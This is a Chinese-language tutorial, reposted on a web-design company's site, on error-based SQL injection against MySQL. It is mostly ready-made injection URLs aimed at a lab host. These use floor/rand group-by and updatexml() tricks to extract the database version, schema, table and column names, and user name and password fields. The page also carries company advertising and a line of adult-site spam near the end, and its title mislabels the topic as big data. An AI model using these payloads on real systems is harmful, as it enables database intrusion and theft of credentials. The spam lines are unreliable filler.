大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

這篇文章將為大家詳細(xì)講解有關(guān)大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個(gè)參考，希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

成都創(chuàng)新互聯(lián)公司專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù)，包含不限于網(wǎng)站設(shè)計(jì)、成都網(wǎng)站設(shè)計(jì)、成武網(wǎng)絡(luò)推廣、成都微信小程序、成武網(wǎng)絡(luò)營銷、成武企業(yè)策劃、成武品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運(yùn)營等，從售前售中售后，我們都將竭誠為您服務(wù)，您的肯定，是我們最大的嘉獎(jiǎng)；成都創(chuàng)新互聯(lián)公司為所有大學(xué)生創(chuàng)業(yè)者提供成武建站搭建服務(wù)，24小時(shí)服務(wù)熱線：028-86922220，官方網(wǎng)址：jinyejixie.com

一、相關(guān)函數(shù)

1、rand()：產(chǎn)生一個(gè)0-1之間隨機(jī)數(shù)，rand(0),隨機(jī)產(chǎn)生一個(gè)0-1的隨機(jī)數(shù)，運(yùn)行多次產(chǎn)生的結(jié)果一樣

2、floor()：向下取整，floor(rand()*2)，隨機(jī)產(chǎn)生0和1兩個(gè)數(shù)

3、group by：分組排列

4、count(*)：統(tǒng)計(jì)數(shù)量

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

5、concat()：將字符串連接起來

二、通過floor()函數(shù)構(gòu)造注入語句

1、訪問http://192.168.0.104/aiyou/bczr.php?id=2，返回正常頁面

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

2、訪問http://192.168.0.104/aiyou/bczr.php?id=2'，返回錯(cuò)誤頁面

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

3、構(gòu)造閉合語句，192.168.0.104/aiyou/bczr.php?id=2' --+，頁面返回正常

4、獲取數(shù)據(jù)庫版本

192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,(version()))x from information_schema.tables group by x )a) --+

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的 5、獲取數(shù)據(jù)庫名稱

192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,database(),0x23)x from information_schema.tables group by x )a) --+

6、獲取其他數(shù)據(jù)庫名稱(修改紅色數(shù)字，獲取不同數(shù)據(jù)庫名)

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

7、獲取表名(修改紅色數(shù)字，獲取不同表名)

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

8、獲取字段名，需要指定表名，表名用十六進(jìn)制表示，修改紅色數(shù)字獲取不同字段

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x75736572 LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

9、獲取字段內(nèi)容

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,name,0x3a,pass,0x23) FROM user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

三、通過updatexml函數(shù)構(gòu)造注入語句

1、獲取數(shù)據(jù)庫名稱(通過修改紅色數(shù)字獲取不同的數(shù)據(jù)庫名稱)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 5,1),1) -- +

2、獲取表名(通過修改紅色數(shù)字獲取不同的表名)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (table_name),0x7e) from information_schema.tables where table_schema='jay' limit 1,1),1) -- +

3、獲取字段名(通過修改紅色數(shù)字獲取不同的字段)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (column_name),0x7e) from information_schema.columns where table_name=0x75736572 limit 1,1),1) -- +

4、獲取字段內(nèi)容（修改紅色數(shù)字，獲取不同字段內(nèi)容）

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, pass,0x7e,name,0x7e) from user limit 1,1),1) -- +

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

關(guān)于大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到。

網(wǎng)站欄目：大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的
新聞來源：http://jinyejixie.com/article18/possgp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站收錄、域名注冊(cè)、品牌網(wǎng)站設(shè)計(jì)、用戶體驗(yàn)、微信公眾號(hào)、服務(wù)器托管

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源：創(chuàng)新互聯(lián)

猜你還喜歡下面的內(nèi)容

成人午夜视频全免费观看高清-秋霞福利视频一区二区三区-国产精品久久久久电影小说-亚洲不卡区三一区三区一区

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的